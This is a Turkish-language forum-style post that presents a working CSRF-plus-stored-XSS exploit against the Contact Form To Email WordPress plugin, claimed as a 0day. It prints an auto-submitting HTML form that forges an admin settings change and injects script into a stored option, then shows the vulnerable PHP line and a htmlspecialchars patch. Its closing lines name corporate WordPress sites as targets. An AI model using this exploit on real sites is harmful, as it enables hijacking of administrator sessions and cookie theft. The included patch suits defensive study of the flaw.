| |
Contact Form To Email (https://wordpress.org/plugins/contact-form-to-email/) 30 bin kullanicili iletisim eklentisi..
Eklentinin son sürümünde 0day olmak üzere CSRF ve XSS açiklari mevcut..
Exploit ve kullanimini ayrintili olarak anlatiyorum
(Win7 - Google Chrome ile test ettim)
Dip Not : Mozilla kullanmaniz daha avantajli..
Öncelikle exploit code ye bir bakalim
<html>
<bOdy>
<form name="updatereportsettings"
action="http://localhost/wordpress/wp-admin/admin.php?page=cp_contactformtoemail"
method="post">
<input type="hidden" name="cp_cfte_rep_enable" value="No">
<input type="hidden" name="cp_cfte_rep_hour" value="00">
<input name="cp_cfte_fp_from_email" value="Hidden" type="hidden">
<input name="cp_cfte_rep_emails" value="Hidden" type="hidden">
<input name="cp_cfte_rep_subject" value="hidden" type="hidden">
<input type="hidden" name="cp_cfte_rep_emailformat" value="text">
<input type="hidden" name="cp_cfte_rep_message"
value=’"></textarea><script>alert(document.cookie)</script>’>
<script language="Javascript">
setTimeout(’updatereportsettings.submit()’, 1);
</script>
</form>
</bOdy>
</html>
Yesil alana dikkat...
Simdi vulnerable code ye geçelim.
<textarea type="CyberWarrior Bilisimin Yer Alti Dünyasi" name="cp_cfte_rep_message" rows="3"
cols="80"><?php echo get_option(’cp_cfte_rep_message’, ’Attached you will find the data from the form submissions.’); ?></textarea></td>
ve XSS Patch..
<textarea type="CyberWarrior Bilisimin Yer Alti Dünyasi" name="cp_cfte_rep_message" rows="3"
cols="80"><?php echo htmlspecialchars(get_option(’cp_cfte_rep_message’, ’Attached you will find the data from the form submissions.’)); ?></textarea></td>
[#] php echo’yu kullaniyoruz.
[#] attack : http://hedef/wordpress/wp-admin/admin.php?page=cp_contactformtoemail
[#] hedef : kurumsal tabanli wp sistemi entegre edilmis special siteler |
